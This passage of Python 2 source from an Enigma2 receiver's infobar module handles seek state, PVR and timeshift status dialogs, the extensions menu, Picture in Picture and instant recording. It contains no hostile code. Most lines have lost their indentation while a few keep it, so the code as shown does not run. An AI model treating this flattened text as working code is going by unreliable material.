if self.seekstate == self.SEEK_STATE_PLAY or self.seekstate == self.SEEK_STATE_EOF:
self.lockedBecauseOfSkipping = False
self.unlockShow()
else:
wantlock = self.seekstate != self.SEEK_STATE_PLAY
if config.usage.show_infobar_on_skip.value:
if self.lockedBecauseOfSkipping and not wantlock:
self.unlockShow()
self.lockedBecauseOfSkipping = False
if wantlock and not self.lockedBecauseOfSkipping:
self.lockShow()
self.lockedBecauseOfSkipping = True
	def calcRemainingTime(self):
		seekable = self.getSeek()
		if seekable is not None:
			length = seekable.getLength()
			try:
				tmp = self.cueGetEndCutPosition()
				if tmp:
					length = (False, tmp)
			except:
				pass
			pos = seekable.getPlayPosition()
			speednom = self.seekstate[1] or 1
			speedden = self.seekstate[2] or 1
			if not length[0] and not pos[0]:
				if length[1] <= pos[1]:
					return 0
				# remaining real time in milliseconds at the current trick-play speed
				time = (length[1] - pos[1]) * speedden / (90 * speednom)
				return time
		return False
def __evEOF(self):
global seek_withjumps_muted
if self.seekstate == self.SEEK_STATE_EOF:
return
else:
if seek_withjumps_muted and eDVBVolumecontrol.getInstance().isMuted():
				print "[InfoBarGenerics] still muted after FFWD/FBACK, unmuting"
seek_withjumps_muted = False
eDVBVolumecontrol.getInstance().volumeUnMute()
seekstate = self.seekstate
if self.seekstate != self.SEEK_STATE_PAUSE:
self.setSeekState(self.SEEK_STATE_EOF)
if seekstate not in (self.SEEK_STATE_PLAY, self.SEEK_STATE_PAUSE):
seekable = self.getSeek()
if seekable is not None:
seekable.seekTo(-1)
self.doEofInternal(True)
if seekstate == self.SEEK_STATE_PLAY:
self.doEofInternal(True)
else:
self.doEofInternal(False)
return
def doEofInternal(self, playing):
pass
def __evSOF(self):
self.setSeekState(self.SEEK_STATE_PLAY)
self.doSeek(0)
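# InfoBarPVRState mirrors the current seek state into a small PVR status
# dialog; __playStateChanged() below dispatches on the state label (">", "||",
# "END", ">> Nx", "<< Nx", "/N") to pick the status icon and speed text.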
class InfoBarPVRState:
def __init__(self, screen=PVRState, force_show = False):
self.onChangedEntry = [ ]
self.onPlayStateChanged.append(self.__playStateChanged)
self.pvrStateDialog = self.session.instantiateDialog(screen)
self.pvrStateDialog.setAnimationMode(0)
self.onShow.append(self._mayShow)
self.onHide.append(self.pvrStateDialog.hide)
self.force_show = force_show
def createSummary(self):
return InfoBarMoviePlayerSummary
def _mayShow(self):
if self.has_key("state") and not config.usage.movieplayer_pvrstate.value:
self["state"].setText("")
self["statusicon"].setPixmapNum(6)
self["speed"].setText("")
if self.shown and self.seekstate != self.SEEK_STATE_EOF and not config.usage.movieplayer_pvrstate.value:
self.pvrStateDialog.show()
self.startHideTimer()
def __playStateChanged(self, state):
playstateString = state[3]
state_summary = playstateString
if self.pvrStateDialog.has_key("statusicon"):
self.pvrStateDialog["state"].setText(playstateString)
if playstateString == '>':
self.pvrStateDialog["statusicon"].setPixmapNum(0)
self.pvrStateDialog["speed"].setText("")
speed_summary = self.pvrStateDialog["speed"].text
statusicon_summary = 0
if self.has_key("state") and config.usage.movieplayer_pvrstate.value:
self["state"].setText(playstateString)
self["statusicon"].setPixmapNum(0)
self["speed"].setText("")
elif playstateString == '||':
self.pvrStateDialog["statusicon"].setPixmapNum(1)
self.pvrStateDialog["speed"].setText("")
speed_summary = self.pvrStateDialog["speed"].text
statusicon_summary = 1
if self.has_key("state") and config.usage.movieplayer_pvrstate.value:
self["state"].setText(playstateString)
self["statusicon"].setPixmapNum(1)
self["speed"].setText("")
elif playstateString == 'END':
self.pvrStateDialog["statusicon"].setPixmapNum(2)
self.pvrStateDialog["speed"].setText("")
speed_summary = self.pvrStateDialog["speed"].text
statusicon_summary = 2
if self.has_key("state") and config.usage.movieplayer_pvrstate.value:
self["state"].setText(playstateString)
self["statusicon"].setPixmapNum(2)
self["speed"].setText("")
elif playstateString.startswith('>>'):
speed = state[3].split()
self.pvrStateDialog["statusicon"].setPixmapNum(3)
self.pvrStateDialog["speed"].setText(speed[1])
speed_summary = self.pvrStateDialog["speed"].text
statusicon_summary = 3
if self.has_key("state") and config.usage.movieplayer_pvrstate.value:
self["state"].setText(playstateString)
self["statusicon"].setPixmapNum(3)
self["speed"].setText(speed[1])
elif playstateString.startswith('<<'):
speed = state[3].split()
self.pvrStateDialog["statusicon"].setPixmapNum(4)
self.pvrStateDialog["speed"].setText(speed[1])
speed_summary = self.pvrStateDialog["speed"].text
statusicon_summary = 4
if self.has_key("state") and config.usage.movieplayer_pvrstate.value:
self["state"].setText(playstateString)
self["statusicon"].setPixmapNum(4)
self["speed"].setText(speed[1])
elif playstateString.startswith('/'):
self.pvrStateDialog["statusicon"].setPixmapNum(5)
self.pvrStateDialog["speed"].setText(playstateString)
speed_summary = self.pvrStateDialog["speed"].text
statusicon_summary = 5
if self.has_key("state") and config.usage.movieplayer_pvrstate.value:
self["state"].setText(playstateString)
self["statusicon"].setPixmapNum(5)
self["speed"].setText(playstateString)
for cb in self.onChangedEntry:
cb(state_summary, speed_summary, statusicon_summary)
# if we return into "PLAY" state, ensure that the dialog gets hidden if there will be no infobar displayed
if not config.usage.show_infobar_on_skip.value and self.seekstate == self.SEEK_STATE_PLAY and not self.force_show:
self.pvrStateDialog.hide()
else:
self._mayShow()
class InfoBarTimeshiftState(InfoBarPVRState):
def __init__(self):
InfoBarPVRState.__init__(self, screen=TimeshiftState, force_show=True)
self.onPlayStateChanged.append(self.__timeshiftEventName)
self.onHide.append(self.__hideTimeshiftState)
	def _mayShow(self):
		if config.usage.enableVodMode.value:
			name = None
			url = None
			ext = ['.3g2', '.3gp', '.asf', '.asx', '.avi', '.flv', '.m2ts', '.mkv',
				'.mov', '.mp4', '.mpg', '.mpeg', '.rm', '.swf', '.vob', '.wmv']
			if self.session.nav.getCurrentlyPlayingServiceReference():
				name = self.session.nav.getCurrentlyPlayingServiceReference().toString().startswith('4097:')
				url = ServiceReference(self.session.nav.getCurrentlyPlayingServiceReference()).getPath()
		if self.shown and self.timeshiftEnabled() and self.isSeekable():
			InfoBarTimeshift.ptsSeekPointerSetCurrentPos(self)
			if config.timeshift.showinfobar.value:
				self['TimeshiftSeekPointerActions'].setEnabled(True)
			self.pvrStateDialog.show()
		if config.usage.enableVodMode.value:
			if name == True and self.isSeekable() and url.endswith(tuple(ext)):
				InfoBarTimeshift.ptsSeekPointerSetCurrentPos(self)
				if config.timeshift.showinfobar.value:
					self['TimeshiftSeekPointerActions'].setEnabled(True)
				self.pvrStateDialog.show()
		if not self.isSeekable():
			self.startHideTimer()
		return
def __hideTimeshiftState(self):
self['TimeshiftSeekPointerActions'].setEnabled(False)
self.pvrStateDialog.hide()
	def __timeshiftEventName(self, state):
		name = None
		url = None
		if self.session.nav.getCurrentlyPlayingServiceReference():
			name = ServiceReference(self.session.nav.getCurrentlyPlayingServiceReference()).getServiceName()
			url = ServiceReference(self.session.nav.getCurrentlyPlayingServiceReference()).getPath()
		if self.timeshiftEnabled() and os.path.exists('%spts_livebuffer_%s.meta' % (config.usage.timeshift_path.value, self.pts_currplaying)):
			readmetafile = open('%spts_livebuffer_%s.meta' % (config.usage.timeshift_path.value, self.pts_currplaying), 'r')
			servicerefname = readmetafile.readline()[0:-1]
			eventname = readmetafile.readline()[0:-1]
			readmetafile.close()
			self.pvrStateDialog['eventname'].setText(eventname)
		elif config.usage.enableVodMode.value:
			ext = ['.3g2', '.3gp', '.asf', '.asx', '.avi', '.flv', '.m2ts', '.mkv',
				'.mov', '.mp4', '.mpg', '.mpeg', '.rm', '.swf', '.vob', '.wmv']
			if str(url).endswith(tuple(ext)):
				self.pvrStateDialog['eventname'].setText(name)
			else:
				self.pvrStateDialog['eventname'].setText('')
		else:
			self.pvrStateDialog['eventname'].setText('')
		return
class InfoBarShowMovies:
	# This class merely maps the up/down/movieList actions onto an otherwise
	# unspecified "movie list", so it is little more than an action map.
def __init__(self):
self["MovieListActions"] = HelpableActionMap(self, "InfobarMovieListActions",
{
"movieList": (self.showMovies, _("Open the movie list")),
"up": (self.up, _("Open the movie list")),
"down": (self.down, _("Open the movie list"))
})
from Screens.PiPSetup import PiPSetup
class InfoBarExtensions:
EXTENSION_SINGLE = 0
EXTENSION_LIST = 1
def __init__(self):
self.list = []
if config.plisettings.ColouredButtons.value:
self["InstantExtensionsActions"] = HelpableActionMap(self, "InfobarExtensions",
{
"showPluginBrowser": (self.showPluginBrowser, _("Show the plugin browser..")),
"showEventInfo": (self.SelectopenEventView, _("Show the infomation on current event.")),
"openTimerList": (self.showTimerList, _("Show the list of timers.")),
"openAutoTimerList": (self.showAutoTimerList, _("Show the list of AutoTimers.")),
"openEPGSearch": (self.showEPGSearch, _("Search the epg for current event.")),
"openIMDB": (self.showIMDB, _("Search IMDb for information about current event.")),
"showMediaPlayer": (self.showMediaPlayer, _("Show the media player...")),
"openDreamPlex": (self.showDreamPlex, _("Show the DreamPlex player...")),
}, 1) # lower priority
else:
self["InstantExtensionsActions"] = HelpableActionMap(self, "InfobarExtensions",
{
"showPluginBrowser": (self.showPluginBrowser, _("Show the plugin browser..")),
"showDreamPlex": (self.showDreamPlex, _("Show the DreamPlex player...")),
"showEventInfo": (self.SelectopenEventView, _("Show the infomation on current event.")),
"showMediaPlayer": (self.showMediaPlayer, _("Show the media player...")),
}, 1) # lower priority
self.addExtension(extension = self.getLogManager, type = InfoBarExtensions.EXTENSION_LIST)
self.addExtension(extension = self.getOsd3DSetup, type = InfoBarExtensions.EXTENSION_LIST)
self.addExtension(extension = self.getCCcamInfo, type = InfoBarExtensions.EXTENSION_LIST)
self.addExtension(extension = self.getOScamInfo, type = InfoBarExtensions.EXTENSION_LIST)
if config.usage.show_restart_network_extensionslist.getValue() is True:
self.addExtension(extension = self.getRestartNetwork, type = InfoBarExtensions.EXTENSION_LIST)
for p in plugins.getPlugins(PluginDescriptor.WHERE_EXTENSIONSINGLE):
p(self)
def SelectopenEventView(self):
try:
self.openEventView()
except:
pass
def getLMname(self):
return _("Log Manager")
def getLogManager(self):
if config.logmanager.showinextensions.value:
return [((boundFunction(self.getLMname), boundFunction(self.openLogManager), lambda: True), None)]
else:
return []
def getRestartNetworkname(self):
return _("Restart Network")
def getRestartNetwork(self):
return [((boundFunction(self.getRestartNetworkname), boundFunction(self.openRestartNetwork), lambda: True), None)]
def get3DSetupname(self):
return _("OSD 3D Setup")
def getOsd3DSetup(self):
		if config.osd.show3dextensions.value:
return [((boundFunction(self.get3DSetupname), boundFunction(self.open3DSetup), lambda: True), None)]
else:
return []
def getCCname(self):
return _("CCcam Info")
def getCCcamInfo(self):
		if pathExists('/usr/bin/'):
			for softcam in os.listdir('/usr/bin/'):
				if softcam.lower().startswith('cccam') and config.cccaminfo.showInExtensions.value:
					return [((boundFunction(self.getCCname), boundFunction(self.openCCcamInfo), lambda: True), None)]
		return []
def getOSname(self):
return _("OScam Info")
def getOScamInfo(self):
		if pathExists('/usr/bin/'):
			for softcam in os.listdir('/usr/bin/'):
				if softcam.lower().startswith('oscam') and config.oscaminfo.showInExtensions.value:
					return [((boundFunction(self.getOSname), boundFunction(self.openOScamInfo), lambda: True), None)]
		return []
def addExtension(self, extension, key = None, type = EXTENSION_SINGLE):
self.list.append((type, extension, key))
if config.usage.sort_extensionslist.value:
self.list.sort()
def updateExtension(self, extension, key = None):
self.extensionsList.append(extension)
if key is not None:
if self.extensionKeys.has_key(key):
key = None
if key is None:
for x in self.availableKeys:
if not self.extensionKeys.has_key(x):
key = x
break
if key is not None:
self.extensionKeys[key] = len(self.extensionsList) - 1
def updateExtensions(self):
self.extensionsList = []
self.availableKeys = [ "1", "2", "3", "4", "5", "6", "7", "8", "9", "0", "red", "green", "yellow", "blue" ]
self.extensionKeys = {}
for x in self.list:
if x[0] == self.EXTENSION_SINGLE:
self.updateExtension(x[1], x[2])
else:
for y in x[1]():
self.updateExtension(y[0], y[1])
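	# Extension registry layout used above: self.list holds (type, extension,
	# key) tuples. A single-type extension is a (nameFunc, actionFunc,
	# availableFunc) triple, while a list-type extension is a callable that
	# returns [((nameFunc, actionFunc, availableFunc), key), ...]. For example,
	# InfoBarPiP below registers
	#   self.addExtension((self.getShowHideName, self.showPiP, lambda: True), "blue")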
def showExtensionSelection(self):
self.updateExtensions()
extensionsList = self.extensionsList[:]
keys = []
list = []
colorlist = []
for x in self.availableKeys:
if self.extensionKeys.has_key(x):
entry = self.extensionKeys[x]
extension = self.extensionsList[entry]
if extension[2]():
name = str(extension[0]())
if self.availableKeys.index(x) < 10:
list.append((extension[0](), extension))
else:
colorlist.append((extension[0](), extension))
keys.append(x)
extensionsList.remove(extension)
else:
extensionsList.remove(extension)
if config.usage.sort_extensionslist.value:
list.sort()
for x in colorlist:
list.append(x)
list.extend([(x[0](), x) for x in extensionsList])
keys += [""] * len(extensionsList)
self.session.openWithCallback(self.extensionCallback, ChoiceBox, title=_("Please choose an extension..."), list = list, keys = keys, skin_name = "ExtensionsList")
def extensionCallback(self, answer):
if answer is not None:
answer[1][1]()
def showPluginBrowser(self):
# from Screens.PluginBrowser import PluginBrowser
# self.session.open(PluginBrowser)
from OPENDROID.BluePanel import BluePanel
self.session.open(BluePanel)
def openCCcamInfo(self):
from Screens.CCcamInfo import CCcamInfoMain
self.session.open(CCcamInfoMain)
def openOScamInfo(self):
from Screens.OScamInfo import OscamInfoMenu
self.session.open(OscamInfoMenu)
def showTimerList(self):
self.session.open(TimerEditList)
def openLogManager(self):
from Screens.LogManager import LogManager
self.session.open(LogManager)
def open3DSetup(self):
from Screens.UserInterfacePositioner import OSD3DSetupScreen
self.session.open(OSD3DSetupScreen)
def openRestartNetwork(self):
try:
from OPENDROID.RestartNetwork import RestartNetwork
self.session.open(RestartNetwork)
except:
			print '[InfoBarGenerics] failed to restart network'
def showAutoTimerList(self):
if os.path.exists("/usr/lib/enigma2/python/Plugins/Extensions/AutoTimer/plugin.pyo"):
from Plugins.Extensions.AutoTimer.plugin import main, autostart
from Plugins.Extensions.AutoTimer.AutoTimer import AutoTimer
from Plugins.Extensions.AutoTimer.AutoPoller import AutoPoller
self.autopoller = AutoPoller()
self.autotimer = AutoTimer()
try:
self.autotimer.readXml()
except SyntaxError as se:
self.session.open(
MessageBox,
_("Your config file is not well-formed:\n%s") % (str(se)),
type = MessageBox.TYPE_ERROR,
timeout = 10
)
return
# Do not run in background while editing, this might screw things up
if self.autopoller is not None:
self.autopoller.stop()
from Plugins.Extensions.AutoTimer.AutoTimerOverview import AutoTimerOverview
self.session.openWithCallback(
self.editCallback,
AutoTimerOverview,
self.autotimer
)
else:
self.session.open(MessageBox, _("The AutoTimer plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def editCallback(self, session):
# XXX: canceling of GUI (Overview) won't affect config values which might have been changed - is this intended?
# Don't parse EPG if editing was canceled
if session is not None:
# Save xml
self.autotimer.writeXml()
# Poll EPGCache
self.autotimer.parseEPG()
# Start autopoller again if wanted
if config.plugins.autotimer.autopoll.value:
if self.autopoller is None:
from Plugins.Extensions.AutoTimer.AutoPoller import AutoPoller
self.autopoller = AutoPoller()
self.autopoller.start()
# Remove instance if not running in background
else:
self.autopoller = None
self.autotimer = None
def showEPGSearch(self):
from Plugins.Extensions.EPGSearch.EPGSearch import EPGSearch
s = self.session.nav.getCurrentService()
if s:
info = s.info()
event = info.getEvent(0) # 0 = now, 1 = next
if event:
name = event and event.getEventName() or ''
else:
name = self.session.nav.getCurrentlyPlayingServiceOrGroup().toString()
name = name.split('/')
name = name[-1]
name = name.replace('.',' ')
name = name.split('-')
name = name[0]
if name.endswith(' '):
name = name[:-1]
if name:
self.session.open(EPGSearch, name, False)
else:
self.session.open(EPGSearch)
else:
self.session.open(EPGSearch)
def showIMDB(self):
if os.path.exists("/usr/lib/enigma2/python/Plugins/Extensions/IMDb/plugin.pyo"):
from Plugins.Extensions.IMDb.plugin import IMDB
s = self.session.nav.getCurrentService()
if s:
info = s.info()
event = info.getEvent(0) # 0 = now, 1 = next
name = event and event.getEventName() or ''
self.session.open(IMDB, name)
else:
self.session.open(MessageBox, _("The IMDb plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def showMediaPlayer(self):
if isinstance(self, InfoBarExtensions):
if isinstance(self, InfoBar):
				try: # the plugin may not be installed
from Plugins.Extensions.MediaPlayer.plugin import MediaPlayer
self.session.open(MediaPlayer)
no_plugin = False
except Exception, e:
self.session.open(MessageBox, _("The MediaPlayer plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def showDreamPlex(self):
if os.path.exists("/usr/lib/enigma2/python/Plugins/Extensions/DreamPlex/plugin.pyo"):
from Plugins.Extensions.DreamPlex.plugin import DPS_MainMenu
self.session.open(DPS_MainMenu)
else:
self.session.open(MessageBox, _("The DreamPlex plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
from Tools.BoundFunction import boundFunction
import inspect
# depends on InfoBarExtensions
class InfoBarPlugins:
def __init__(self):
self.addExtension(extension = self.getPluginList, type = InfoBarExtensions.EXTENSION_LIST)
def getPluginName(self, name):
return name
def getPluginList(self):
l = []
for p in plugins.getPlugins(where = PluginDescriptor.WHERE_EXTENSIONSMENU):
args = inspect.getargspec(p.__call__)[0]
			if len(args) == 1 or (len(args) == 2 and isinstance(self, InfoBarChannelSelection)):
l.append(((boundFunction(self.getPluginName, p.name), boundFunction(self.runPlugin, p), lambda: True), None, p.name))
l.sort(key = lambda e: e[2]) # sort by name
return l
def runPlugin(self, plugin):
if isinstance(self, InfoBarChannelSelection):
plugin(session = self.session, servicelist = self.servicelist)
else:
plugin(session = self.session)
from Components.Task import job_manager
class InfoBarJobman:
def __init__(self):
self.addExtension(extension = self.getJobList, type = InfoBarExtensions.EXTENSION_LIST)
def getJobList(self):
if config.usage.jobtaksextensions.value:
return [((boundFunction(self.getJobName, job), boundFunction(self.showJobView, job), lambda: True), None) for job in job_manager.getPendingJobs()]
else:
return []
def getJobName(self, job):
return "%s: %s (%d%%)" % (job.getStatustext(), job.name, int(100*job.progress/float(job.end)))
def showJobView(self, job):
from Screens.TaskView import JobView
job_manager.in_background = False
self.session.openWithCallback(self.JobViewCB, JobView, job)
def JobViewCB(self, in_background):
job_manager.in_background = in_background
# depends on InfoBarExtensions
class InfoBarPiP:
def __init__(self):
try:
self.session.pipshown
except:
self.session.pipshown = False
self.lastPiPService = None
if SystemInfo["PIPAvailable"] and isinstance(self, InfoBarEPG):
self["PiPActions"] = HelpableActionMap(self, "InfobarPiPActions",
{
"activatePiP": (self.activePiP, self.activePiPName),
})
if self.allowPiP:
self.addExtension((self.getShowHideName, self.showPiP, lambda: True), "blue")
self.addExtension((self.getMoveName, self.movePiP, self.pipShown), "green")
self.addExtension((self.getSwapName, self.swapPiP, self.pipShown), "yellow")
self.addExtension((self.getTogglePipzapName, self.togglePipzap, self.pipShown), "red")
else:
self.addExtension((self.getShowHideName, self.showPiP, self.pipShown), "blue")
self.addExtension((self.getMoveName, self.movePiP, self.pipShown), "green")
self.lastPiPServiceTimeoutTimer = eTimer()
self.lastPiPServiceTimeoutTimer.callback.append(self.clearLastPiPService)
def pipShown(self):
return self.session.pipshown
def pipHandles0Action(self):
return self.pipShown() and config.usage.pip_zero_button.value != "standard"
def getShowHideName(self):
if self.session.pipshown:
return _("Disable Picture in Picture")
else:
return _("Activate Picture in Picture")
def getSwapName(self):
return _("Swap services")
def getMoveName(self):
return _("Picture in Picture Setup")
def getTogglePipzapName(self):
slist = self.servicelist
if slist and slist.dopipzap:
return _("Zap focus to main screen")
return _("Zap focus to Picture in Picture")
def togglePipzap(self):
if not self.session.pipshown:
self.showPiP()
slist = self.servicelist
if slist and self.session.pipshown:
slist.togglePipzap()
if slist.dopipzap:
currentServicePath = slist.getCurrentServicePath()
self.servicelist.setCurrentServicePath(self.session.pip.servicePath, doZap=False)
self.session.pip.servicePath = currentServicePath
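	# showPiP() toggles Picture in Picture: on teardown it remembers the last
	# PiP service for config.usage.pip_last_service_timeout seconds so a quick
	# re-activation can restore it; on activation it prefers that remembered
	# service over the currently playing one.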
def showPiP(self):
self.lastPiPServiceTimeoutTimer.stop()
slist = self.servicelist
if self.session.pipshown:
if slist and slist.dopipzap:
self.togglePipzap()
if self.session.pipshown:
lastPiPServiceTimeout = int(config.usage.pip_last_service_timeout.value)
if lastPiPServiceTimeout >= 0:
self.lastPiPService = self.session.pip.getCurrentServiceReference()
if lastPiPServiceTimeout:
self.lastPiPServiceTimeoutTimer.startLongTimer(lastPiPServiceTimeout)
del self.session.pip
if SystemInfo["LCDMiniTV"]:
if config.lcd.modepip.value >= "1":
print '[LCDMiniTV] disable PIP'
f = open("/proc/stb/lcd/mode", "w")
f.write(config.lcd.modeminitv.value)
f.close()
self.session.pipshown = False
if hasattr(self, "ScreenSaverTimerStart"):
self.ScreenSaverTimerStart()
else:
service = self.session.nav.getCurrentService()
info = service and service.info()
if info:
xres = str(info.getInfo(iServiceInformation.sVideoWidth))
				if (info and int(xres) <= 720) or getMachineBuild() != 'blackbox7405':
self.session.pip = self.session.instantiateDialog(PictureInPicture)
self.session.pip.setAnimationMode(0)
self.session.pip.show()
newservice = self.lastPiPService or self.session.nav.getCurrentlyPlayingServiceReference() or self.servicelist.servicelist.getCurrent()
if self.session.pip.playService(newservice):
self.session.pipshown = True
self.session.pip.servicePath = self.servicelist.getCurrentServicePath()
if SystemInfo["LCDMiniTVPiP"] and int(config.lcd.modepip.value) >= 1:
print '[LCDMiniTV] enable PIP'
f = open("/proc/stb/lcd/mode", "w")
f.write(config.lcd.modepip.value)
f.close()
f = open("/proc/stb/vmpeg/1/dst_width", "w")
f.write("0")
f.close()
f = open("/proc/stb/vmpeg/1/dst_height", "w")
f.write("0")
f.close()
f = open("/proc/stb/vmpeg/1/dst_apply", "w")
f.write("1")
f.close()
else:
newservice = self.session.nav.getCurrentlyPlayingServiceReference() or self.servicelist.servicelist.getCurrent()
if self.session.pip.playService(newservice):
self.session.pipshown = True
self.session.pip.servicePath = self.servicelist.getCurrentServicePath()
if SystemInfo["LCDMiniTVPiP"] and int(config.lcd.modepip.value) >= 1:
print '[LCDMiniTV] enable PIP'
f = open("/proc/stb/lcd/mode", "w")
f.write(config.lcd.modepip.value)
f.close()
f = open("/proc/stb/vmpeg/1/dst_width", "w")
f.write("0")
f.close()
f = open("/proc/stb/vmpeg/1/dst_height", "w")
f.write("0")
f.close()
f = open("/proc/stb/vmpeg/1/dst_apply", "w")
f.write("1")
f.close()
else:
self.lastPiPService = None
self.session.pipshown = False
del self.session.pip
elif info:
self.session.open(MessageBox, _("Your %s %s does not support PiP HD") % (getMachineBrand(), getMachineName()), type = MessageBox.TYPE_INFO,timeout = 5 )
else:
self.session.open(MessageBox, _("No active channel found."), type = MessageBox.TYPE_INFO,timeout = 5 )
if self.session.pipshown and hasattr(self, "screenSaverTimer"):
self.screenSaverTimer.stop()
def clearLastPiPService(self):
self.lastPiPService = None
def activePiP(self):
		if (self.servicelist and self.servicelist.dopipzap) or not self.session.pipshown:
self.showPiP()
else:
self.togglePipzap()
def activePiPName(self):
if self.servicelist and self.servicelist.dopipzap:
return _("Disable Picture in Picture")
if self.session.pipshown:
return _("Zap focus to Picture in Picture")
else:
return _("Activate Picture in Picture")
def swapPiP(self):
if self.pipShown():
swapservice = self.session.nav.getCurrentlyPlayingServiceOrGroup()
pipref = self.session.pip.getCurrentService()
if swapservice and pipref and pipref.toString() != swapservice.toString():
currentServicePath = self.servicelist.getCurrentServicePath()
currentBouquet = self.servicelist and self.servicelist.getRoot()
self.servicelist.setCurrentServicePath(self.session.pip.servicePath, doZap=False)
self.session.pip.playService(swapservice)
self.session.nav.stopService() # stop portal
self.session.nav.playService(pipref, checkParentalControl=False, adjust=False)
self.session.pip.servicePath = currentServicePath
self.session.pip.servicePath[1] = currentBouquet
if self.servicelist.dopipzap:
# This unfortunately won't work with subservices
self.servicelist.setCurrentSelection(self.session.pip.getCurrentService())
def movePiP(self):
if self.pipShown():
self.session.open(PiPSetup, pip = self.session.pip)
def pipDoHandle0Action(self):
use = config.usage.pip_zero_button.value
if "swap" == use:
self.swapPiP()
elif "swapstop" == use:
self.swapPiP()
self.showPiP()
elif "stop" == use:
self.showPiP()
class InfoBarInstantRecord():
def __init__(self):
self['InstantRecordActions'] = HelpableActionMap(self, 'InfobarInstantRecord', {'instantRecord': (self.instantRecord, _('Instant recording...'))})
self.SelectedInstantServiceRef = None
if isStandardInfoBar(self):
self.recording = []
else:
from Screens.InfoBar import InfoBar
InfoBarInstance = InfoBar.instance
if InfoBarInstance:
self.recording = InfoBarInstance.recording
self.saveTimeshiftEventPopupActive = False
return
def moveToTrash(self, entry):
print '[InfoBarGenerics] instantRecord stop and delete recording: ', entry.name
import Tools.Trashcan
trash = Tools.Trashcan.createTrashFolder(entry.Filename)
from MovieSelection import moveServiceFiles
moveServiceFiles(entry.Filename, trash, entry.name, allowCopy=False)
def stopCurrentRecording(self, entry = -1):
def confirm(answer = False):
if answer:
self.session.nav.RecordTimer.removeEntry(self.recording[entry])
if self.deleteRecording:
self.moveToTrash(self.recording[entry])
self.recording.remove(self.recording[entry])
if entry is not None and entry != -1:
msg = _('Stop recording:')
if self.deleteRecording:
msg = _('Stop and delete recording:')
msg += '\n'
msg += ' - ' + self.recording[entry].name + '\n'
self.session.openWithCallback(confirm, MessageBox, msg, MessageBox.TYPE_YESNO)
return
def stopAllCurrentRecordings(self, list):
def confirm(answer = False):
if answer:
for entry in list:
self.session.nav.RecordTimer.removeEntry(entry[0])
self.recording.remove(entry[0])
if self.deleteRecording:
self.moveToTrash(entry[0])
msg = _('Stop recordings:')
if self.deleteRecording:
msg = _('Stop and delete recordings:')
msg += '\n'
for entry in list:
msg += ' - ' + entry[0].name + '\n'
self.session.openWithCallback(confirm, MessageBox, msg, MessageBox.TYPE_YESNO)
def getProgramInfoAndEvent(self, info, name):
info["serviceref"] = hasattr(self, "SelectedInstantServiceRef") and self.SelectedInstantServiceRef or self.session.nav.getCurrentlyPlayingServiceOrGroup()
event = None
try:
epg = eEPGCache.getInstance()
event = epg.lookupEventTime(info["serviceref"], -1, 0)
if event is None:
if hasattr(self, "SelectedInstantServiceRef") and self.SelectedInstantServiceRef:
service_info = eServiceCenter.getInstance().info(self.SelectedInstantServiceRef)
event = service_info and service_info.getEvent(self.SelectedInstantServiceRef)
else:
service = self.session.nav.getCurrentService()
event = service and service.info().getEvent(0)
except:
pass
info["event"] = event
info["name"] = name
info["description"] = ""
info["eventid"] = None
if event is not None:
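			# parseEvent() yields (begin, end, name, description, eventId, ...), as indexed below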
curEvent = parseEvent(event)
info["name"] = curEvent[2]
info["description"] = curEvent[3]
info["eventid"] = curEvent[4]
info["end"] = curEvent[1]
return
def startInstantRecording(self, limitEvent = False):
begin = int(time())
end = begin + 3600 # dummy
name = "instant record"
info = { }
self.getProgramInfoAndEvent(info, name)
serviceref = info["serviceref"]
event = info["event"]
if event is not None:
if limitEvent:
end = info["end"]
else:
if limitEvent:
self.session.open(MessageBox, _("No event info found, recording indefinitely."), MessageBox.TYPE_INFO)
if isinstance(serviceref, eServiceReference):
serviceref = ServiceReference(serviceref)
recording = RecordTimerEntry(serviceref, begin, end, info["name"], info["description"], info["eventid"], afterEvent = AFTEREVENT.AUTO, justplay = False, always_zap = False, dirname = preferredInstantRecordPath())
recording.dontSave = True
if event is None or limitEvent == False:
recording.autoincrease = True
recording.setAutoincreaseEnd()
simulTimerList = self.session.nav.RecordTimer.record(recording)
if simulTimerList is None: # no conflict
recording.autoincrease = False
self.recording.append(recording)
else:
if len(simulTimerList) > 1:
name = simulTimerList[1].name
name_date = ' '.join((name, strftime('%F %T', localtime(simulTimerList[1].begin))))
recording.autoincrease = True
if recording.setAutoincreaseEnd():
self.session.nav.RecordTimer.record(recording)
self.recording.append(recording)
self.session.open(MessageBox, _("Record time limited due to conflicting timer %s") % name_date, MessageBox.TYPE_INFO)
else:
self.session.open(MessageBox, _("Could not record due to conflicting timer %s") % name, MessageBox.TYPE_INFO)
else:
self.session.open(MessageBox, _("Could not record due to invalid service %s") % serviceref, MessageBox.TYPE_INFO)
recording.autoincrease = False
return
def isInstantRecordRunning(self):
if self.recording:
for x in self.recording:
if x.isRunning():
return True
return False
def recordQuestionCallback(self, answer):
if answer is None or answer[1] == "no":
self.saveTimeshiftEventPopupActive = False
return
else:
list = []
recording = self.recording[:]
for x in recording:
if x not in self.session.nav.RecordTimer.timer_list:
self.recording.remove(x)
elif x.dontSave and x.isRunning():
list.append((x, False))
self.deleteRecording = False
if answer[1] == 'changeduration':
if len(self.recording) == 1:
self.changeDuration(0)
else:
self.session.openWithCallback(self.changeDuration, TimerSelection, list)
elif answer[1] == 'addrecordingtime':
if len(self.recording) == 1:
self.addRecordingTime(0)
else:
self.session.openWithCallback(self.addRecordingTime, TimerSelection, list)
elif answer[1] == 'changeendtime':
if len(self.recording) == 1:
self.setEndtime(0)
else:
self.session.openWithCallback(self.setEndtime, TimerSelection, list)
elif answer[1] == 'timer':
import TimerEdit
self.session.open(TimerEdit.TimerEditList)
elif answer[1] == 'stop':
if len(self.recording) == 1:
self.stopCurrentRecording(0)
else:
self.session.openWithCallback(self.stopCurrentRecording, TimerSelection, list)
elif answer[1] == 'stopdelete':
self.deleteRecording = True
if len(self.recording) == 1:
self.stopCurrentRecording(0)
else:
self.session.openWithCallback(self.stopCurrentRecording, TimerSelection, list)
elif answer[1] == 'stopall':
self.stopAllCurrentRecordings(list)
elif answer[1] == 'stopdeleteall':
self.deleteRecording = True
self.stopAllCurrentRecordings(list)
elif answer[1] in ('indefinitely', 'manualduration', 'manualendtime', 'event'):
from Components.About import about
if len(list) >= 2 and about.getChipSetString() in ('meson-6', 'meson-64'):
